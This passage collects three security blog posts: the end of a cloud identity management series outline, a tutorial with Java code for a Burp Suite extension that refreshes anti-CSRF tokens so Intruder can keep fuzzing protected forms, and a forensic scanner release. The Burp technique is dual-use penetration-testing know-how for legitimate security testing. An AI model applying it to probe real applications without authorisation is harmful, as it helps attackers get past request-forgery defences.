    • Architecture and Design: We will start by describing key concepts, including consumer/service patterns, roles, assertions, tokens, identity providers, relying party applications, and trust. We will discuss the available technologies fors the heavy lifting (such as SAML, XACML, and SCIM) and discuss the problems they are designed to solve. We will finish with an outline of the different architectural models that will frame how you implement cloud identity services, including the integration patterns and tools that support each model.
    • Implementation Roadmap: IAM projects are complex, encompass most IT infrastructure, and may take years to implement. Trying to do everything at once is a recipe for failure. This portion of our discussion will help ensure you don’t bite off more than you can chew. We will discuss how to select an architectural model that meets your requirements, based on the cloud service and deployment models you selected. Then we will create different implementation roadmaps depending on your project goals and critical business requirements.
    • Buyer’s Guide: We will close by examining key decision criteria to help select a platform. We will provide questions to determine with vendors offer solutions that support your architectural model and criteria to measure the appropriateness of a vendor solution against your design goals. We will also help walk you through the evaluation process.

    As always, we encourage you to ask questions and chime in with comments and suggestions. The community helps make our research better, and we encourage your participation.


    Next: the problems addressed by cloud identity services.


    - Adrian Lane
    (1) Comments

    Adding Anti-CSRF Support to Burp Suite Intruder

    Adding Anti-CSRF Support to Burp Suite Intruder:
    In the web application penetration testing industry, Burp Suite is considered a must-have tool – it includes an intercepting proxy, both active and passive web vulnerability scanners, crawler, session ID analysis tools and various other useful features, all under a single application. One of Burp's best features is the Intruder, a tool which allows the tester to provide a list of values which should be sent to the application as parameter values. By providing values which trigger SQL errors or inject Javascript into the resulting page, one can easily determine if and how the application is doing filtering on the parameters, and whether it is vulnerable to a given issue.


    Intruder
    Burp's Intruder works perfectly when the application responds to those requests as if they came from the user. The screenshot above shows the submission of the following HTML form:
    <form action="/CSRFGuardTestAppVulnerable/HelloWorld" 
      method="POST" name="first">
        <input type="text" value="SpiderLabs" name="name">
        <input type="submit" value="submit" name="submit">
    </form>
    
    However, modern application frameworks are adding support for Anti-CSRF (Cross-Site Request Forgery) techniques, which protect the application from forged requests such as those Burp uses. The most commonly implemented prevention measure is the Synchronizer Token Pattern, which adds a parameter with a random value to all forms generated by the application for a given user session, and validates this token when the form is submitted. For example:
    <form action="/CSRFGuardTestApp/HelloWorld"
      method="POST" name="first">
        <input type="text" value="SpiderLabs" name="name">
        <input type="submit" value="submit" name="submit">
        <input type="hidden" value="Z0XN-1FRF-975E-GB9F-GGQM-L2RC-04H1-GKHQ"
          name="OWASP_CSRFTOKEN">
    </form>
    
    Because the OWASP_CSRFTOKEN parameter will change between every submission, the Intruder will not work, as it expects the application to respond to the request as if they came from the user. The solution is rather simple: instead of simply feeding a set of values to the parameters being tested, we need to have the Intruder populate the Anti-CSRF token parameter from the form page.
    Intruder_regular

    This changes the default behavior of the Intruder tool quite a bit. First, it must know which parameter represents the Anti-CSRF token in the request. While many frameworks will use parameter names that include the "csrf" string, this can be configured per application, and thus we cannot rely on automatic detection. Second, it means the Intruder must make twice the number of requests it would normally perform: one to fetch the form page, which contains the Anti-CSRF token embedded in it, and a second one to actually submit the form with the parameter values provided by the tester. We will address both issues by developing a Burp extension called CSRF Intruder.
    Burp offers an extensibility API, called Burp Extender, which allows us to hook into various points in the application, including the UI and the request interception engine. The first thing we need to do is create a Java class which will host our extension.
    package burp;
    
    import spiderlabs.burp.intruder.CSRFIntruder;
    
    public class BurpExtender {
        private IBurpExtenderCallbacks callbacks;
        private CSRFIntruder csrfIntruder;
    
        public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
            this.callbacks = callbacks;
            this.csrfIntruder = new CSRFIntruder(this.callbacks);
            this.callbacks.registerMenuItem("CSRF Intruder", this.csrfIntruder);
            this.callbacks.issueAlert(String.format("Starting up CSRF Intruder extension [%s]",
                    this.getClass().getCanonicalName()));
        }
        
        public void processHttpMessage(java.lang.String toolName, boolean messageIsRequest,
            IHttpRequestResponse messageInfo) {
            /* Intercept Intruder requests and check if they came from CSRF Intruder */
            if (toolName.equals("intruder") && messageIsRequest)
                this.callbacks.issueAlert("TODO: Intercept CSRF Intruder requests");
        }
    }
    
    The registerExtenderCallbacks() method acts as the extension constructor, and is the first method called by Burp when the extension is loaded. It provides us with a IBurpExtenderCallbacks instance, which we use to create a new context menu entry for our CSRF Intruder handler. We also implement a processHttpMessage() method, which we will use to intercept Intruder requests and modify the Anti-CSRF token velues before they are sent to the remote application.
    How does Burp use this class? It must obey a series of restrictions before Burp can find and use it:
    • It must be in package burp;
    • It must be named BurpExtender;
    • It must implement at least one of the methods in interface IBurpExtender;
    • Burp must be executed with the JVM classpath pointing to our BurpExtender class:

      java -classpath burp.jar;BurpProxyExtender.jar burp.StartBurp
    If these criteria are met, then when Burp starts up our CSRF Intruder extension message should show up in the Alerts tab.
    Burp_alerts
    We can now right-click everywhere where a "Send to [...]" menu entry is displayed and click on "CSRF Intruder".
    Csrf_intruder_context_menu
    Clicking on the CSRF Intruder menu entry will trigger the handler in our CSRFIntruder class, shown below:
    package spiderlabs.burp.intruder;
    
    import javax.swing.JOptionPane;
    
    import spiderlabs.burp.intruder.gui.CSRFConfigurationDialog;
    import burp.IBurpExtenderCallbacks;
    import burp.IHttpRequestResponse;
    import burp.IMenuItemHandler;
    
    public class CSRFIntruder implements IMenuItemHandler {
        private IBurpExtenderCallbacks callbacks;
        
        public CSRFIntruder(IBurpExtenderCallbacks callbacks) {
            this.callbacks = callbacks;
        }
        
        @Override
        public void menuItemClicked(String caption, IHttpRequestResponse[] messageInfo) {
            try {
                IHttpRequestResponse message = messageInfo[0];
                
                String refererUrl = new String();
                for (String header: this.callbacks.getHeaders(message.getRequest())) {
                    System.out.println(header);
                    if (header.startsWith("Referer:"))
                        refererUrl = header.split(":\\s")[1];
                }
                
                String parameters[][] = this.callbacks.getParameters(message.getRequest());
                CSRFIntruderConfiguration configuration =
                        CSRFConfigurationDialog.getConfigurationFromDialog(refererUrl, parameters);
                this.callbacks.issueAlert(configuration.toString());
            } catch (Exception exception) {
                this.callbacks.issueAlert(String.format("Error while obtaining request URL: %s",
                        exception.toString()));
            }
        }
    }
    
    The menuItemClicked() handler does two things: first, it fetches the value of the Referer header (if present) from the request the user right-clicked on and uses it as the suggested source form URL, that is, the place where we can find the Anti-CSRF token values; next, it obtain a list of all parameters in that request. It then sends those to a CSRFConfigurationDialog, which displays the URL and parameters, and waits for the user to configure the Anti-CSRF parameters.
    Csrf_intruder_configuration
    When the user provides the URL and the token parameter to be used, we already have all the information necessary to start up Intruder and manipulate its requests. This will come on a second post.

    Forensic Scanner

    Forensic Scanner: I've posted regarding my thoughts on a Forensic Scanner before, and just today, I gave a short presentation at the #OSDFC conference on the subject.

    Rather than describing the scanner, this time around, I released it.  The archive contains the Perl source code, a 'compiled' executable that you can run on Windows without installing Perl, a directory of plugins, and PDF document describing how to use the tool.  I've also started populating the wiki with information about the tool, and how it's used.

    Some of the feedback I received on the presentation was pretty positive.  I did chat with Simson Garfinkel for a few minutes after the presentation, and he had some interesting thoughts to share.  The second was on making the Forensic Scanner thread-safe, so it can be multi-threaded and use multiple cores.  That might make it on to the "To-Do" list, but it was Simson's first thought that I wanted to address.  He suggested that at a conference were the theme seemed to revolve around analysis frameworks, I should point out the differences between the other frameworks and what I was presenting on, so I wanted to take a moment to do that.

    Brian presented on Autopsy 3.0, and along with another presentation in the morning, discussed some of the features of the framework.  There was the discussion of pipelines, and having modules to perform specific functions, etc.  It's an excellent framework that has the capability of performing functions such as parsing Registry hives (utilizing RegRipper), carving files from unallocated space, etc.  For more details, please see the web site.  

    I should note that there are other open source frameworks available, as well, such as DFF.

    The Forensic Scanner is...different.  Neither better, nor worse...because it addresses a different problem.  For example, you wouldn't use the Forensic Scanner to run a keyword search or carve unallocated space.  The scanner is intended for quickly automating repetitive tasks of data collection, with some ability to either point the analyst in a particular direction, or perform a modicum of analysis along with the data presentation (depending upon how much effort you want to put into writing the plugins).  So, rather than providing an open framework which an analyst can use to perform various analysis functions, the Scanner allows the analyst to perform discrete, repetitive tasks.

    The idea behind the scanner is this...there're things we do all the time when we first initiate our analysis.  One is to collect simple information from the system...it's a Windows system, which version of Windows is it, it's time zone settings, is it 32- or 64-bit, etc.  We collect this information because it can significantly impact our analysis.  However, keeping track of all of these things can be difficult.  For example, if you're looking at an image acquired from a Windows system and don't see Prefetch files, what's your first thought?  Do you check the version of Windows you're examining?  Do you check the Registry values that apply to and control the system's prefetching capabilities?  I've talked with examiners who's first thought is that the user must have deleted the Prefetch files...but how do you know?

    Rather than maintaining extensive checklists of all of these artifacts, why not simply write a plugin to collect what data it is that you want to collect, and possibly add a modicum of analysis into that plugin?  One analyst writes the plugin, shares it, and anyone with that plugin will have access to the functionality without having to have had the same experiences as the analyst.  You share it with all of your analysts, and they all have the capability at their fingertips.  Most analysts recognize the value of the Prefetch files, but some may not work with Windows systems all of the time, and may not stay up on the "latest and greatest" in analysis techniques that can be applied to those files.  So, let's say that instead of dumping all of the module paths embedded in Prefetch files, you add some logic to search for .exe files, .dat files, and any file that includes "temp" in the path, and display that information?  Or, why not create whitelists of modules over time, and have the plugin show you all modules not in that whitelist?

    Something that I and others have found useful is that, instead of forcing the analyst to use "profiles", as with the current version of RegRipper, the Forensic Scanner runs plugins automatically based on OS type, class, and then organizes the plugin results by category.  What this means is that for the system class of plugins, all of the plugins that pertain to "Program Execution" will be grouped together; this holds true for other plugin categories, as well.  This way, you don't have to go searching around for the information in which you're interested.

    As I stated more than once in the presentation, the Scanner is not intended to replace analysis; rather, it's intended to get you to the point of performing analysis much sooner.  For example, I illustrated a plugin that parses a user's IE index.dat file.  Under normal circumstances when performing analysis, you'd have to determine which version of Windows you were examining, determine the path to the particular index.dat file that you're interested in, and then extract it and parse it.  The plugin is capable of doing all of that...in the test case, all of the plugins I ran against a mounted volume completed in under 2 seconds...that's scans of the system, as well as both of the selected user profiles.

    So...please feel free to try the Scanner.  If you have any questions, you know where to reach me.  Just know that this is a work-in-progress, with room for growth.

    Addendum
    Matt Presser identified an issue that the Scanner has with identifying user profiles that contain a dot.  I fixed the issue and will be releasing an update once I make a couple of minor updates to other parts of the code.